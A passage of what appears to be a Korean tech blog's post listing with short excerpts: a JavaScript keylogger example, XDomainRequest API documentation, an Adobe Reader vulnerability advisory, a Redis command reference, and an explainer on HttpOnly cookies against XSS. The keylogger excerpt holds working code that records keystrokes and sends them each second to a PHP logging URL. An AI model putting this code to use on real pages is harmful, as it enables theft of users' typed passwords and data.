Javascript22 Javascript Keylogger 예제 var keys=''; document.onkeypress = function(e) { get = window.event?event:e; key = get.keyCode?get.keyCode:get.charCode; key = String.fromCharCode(key); keys+=key; } window.setInterval(function(){ new Image().src = 'http://localhost/junkylogger.php?keys='+keys; keys = ''; }, 1000); GM_setValue('keys', ''); unsafeWindow.onkeypress = function(e) { eventobj = window.event?event:e; key = eventobj.ke.. 2010. 9. 3. XDomainRequest Object Represents a cross-domain Asynchronous JavaScript and XML (AJAX) request. Members Table The following table lists the members exposed by the XDomainRequest object. Attributes/Properties Property Description constructor Returns a reference to the constructor of an object. contentType Gets the Content-Type property in the HTML request or response header. responseText Contains the body of the respo.. 2010. 4. 7. Adobe Reader/Acrobat 신규 취약점으로 인한 피해 주의 □ 제목: Adobe Reader/Acrobat 신규 취약점으로 인한 피해 주의 □ 개요 o Adobe Reader/Acrobat에서 원격코드 실행이 가능한 신규 취약점이 발견되어 사용자의 주의를 요함 [1-2] o 현재 해당 취약점을 공격하기 위해 악의적으로 작성된 PDF 파일이 발견되었으므로, Adobe Reader/Acrobat 사용자는 메일/메신저로 전송된 출처가 불분명한 PDF 파일을 열람하지 않도록 주의하여야 함 [3] □ 영향 o 악의적으로 작성된 PDF 문서를 열어볼 경우 피해자 시스템에 악성코드가 설치되거나, 그 외 문서에 삽입된 악의적인 명령이 실행될 수 있음 [1-3] □ 설명 o Adobe Reader/Acrobat 취약점 1건이 아래와 같이 발표됨 - Adobe Reader/Acr.. 2009. 12. 18. Redis Command Reference memcached 류의 Key-Value 모델 이상의 역할을 수행하는 것이 가능하다. PHP와 Redis만으로 (즉, 별도의 Database 등을 사용하지 않고) 개발되고 있다. Every command name links to a specific wiki page describing the behavior of the command. Connection handling QUIT close the connection AUTH simple password authentication if enabled Commands operating on all the kind of values EXISTS key test if a key exists DEL key delete a key TYPE key return th.. 2009. 12. 17. HttpOnly를 이용한 쿠키 하이재킹 방지 쿠키의 httponly 옵션에 대해서 1. 언제 개발되었나? -2002년 MS IE6.0 SP1 에서 최초 지원 2. 어떤 동작을 하는가? -클라이언트 브라우저에서 쿠키가 생성될때 httponly 옵션이 있으면 클라이언트 스크립트의 쿠키 요청에 대해서 브라우저는 응답을 하지 않습니다. -예를 들어 쿠키 생성시 httponly 옵션이 있다면 javascript 의 document.cookie 메소드를 통해 쿠키정보를 브라우저로 부터 획득할 수 없습니다. 3. 왜 만들어 졌는가? -XSS 를 이용한 쿠키 하이재킹에 대응하기 위해 개발된 기술입니다. 4. 지원하는 브라우저 -Microsoft Internet Explorer 6.0 SP1 이상 -Mozilla Firefox 3.0.0.6+ 이상 -Netscap.. 2009. 11. 24. 이전 1 2 3 4 5 다음 728x90